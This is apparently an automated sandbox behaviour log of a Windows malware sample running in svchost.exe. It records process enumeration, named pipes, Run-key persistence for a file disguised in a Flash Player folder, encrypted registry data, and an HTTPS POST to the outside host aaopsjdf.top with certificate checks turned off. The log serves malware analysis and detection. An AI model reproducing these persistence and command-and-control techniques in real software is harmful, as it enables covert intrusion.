Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x75fb18f8 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x76690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x766c1d76 True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x761b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x761b3eae True 1
Fn
Module Load module_name = Secur32.dll, base_address = 0x75690000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7582a415 True 1
Fn
System Get Info type = Operating System True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 True 1
Fn
Mutex Create mutex_name = E58EFF540968A436E982FCFA1C0445A2 True 1
Fn
Thread 0x318
(Host: 9, Network: 0)
+
Category Operation Information Success Count Logfile
File Create Pipe pipe_name = pipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
File Read size = 4, size_out = 4 True 1
Fn
Data
File Write size = 4 True 1
Fn
Data
File Write size = 766 True 1
Fn
Data
File Create Pipe pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
File Read size = 4, size_out = 4 True 1
Fn
Data
File Write size = 4 True 2
Fn
Data
Thread 0x31c
(Host: 416, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77ccfda0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Thread 0x394
(Host: 8, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 10
Fn
Mutex Release mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Thread 0x310
(Host: 62, Network: 23)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:56:44 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/ False 1
Fn
Inet Send HTTP Request headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/ True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
